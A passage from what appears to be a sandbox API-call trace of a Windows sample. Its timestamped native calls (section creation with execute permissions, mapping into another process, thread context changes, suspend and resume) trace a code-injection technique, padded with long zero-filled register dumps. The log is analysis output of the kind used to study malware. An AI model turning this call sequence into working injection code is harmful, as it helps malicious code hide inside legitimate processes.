[449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0139.729] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0139.730] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0xee200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0xef000) returned 0x0 [0139.735] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a0, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0xee200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x580000, SectionOffset=0x0, ViewSize=0xde6e8*=0xef000) returned 0x0 [0139.756] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0139.761] NtClose (Handle=0x1a8) returned 0x0 [0139.761] NtSetContextThread (ThreadHandle=0x1a4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x393000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x5db717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0139.764] NtResumeThread (in: ThreadHandle=0x1a4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0139.764] NtClose (Handle=0x1a0) returned 0x0 [0139.765] NtClose (Handle=0x1a4) returned 0x0 [0139.766] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x11bc, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a4) returned 0x0 [0139.766] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0139.766] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0139.766] NtReadVirtualMemory (in: ProcessHandle=0x1a4, BaseAddress=0x46b000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0139.766] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0139.769] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x11c0) | out: ThreadHandle=0xdea64*=0x1a0) returned 0x0 [0139.769] NtSuspendThread (in: ThreadHandle=0x1a0, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0139.770] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2040000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0139.780] NtGetContextThread (in: ThreadHandle=0x1a0, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x46b000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0139.783] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0139.783] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0xd1200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0xd2000) returned 0x0 [0139.790] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0xd1200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x6c0000, SectionOffset=0x0, ViewSize=0xde6e8*=0xd2000) returned 0x0 [0139.816] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0139.821] NtClose (Handle=0x1a8) returned 0x0 [0139.821] NtSetContextThread (ThreadHandle=0x1a0, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x46b000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x6fe717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, 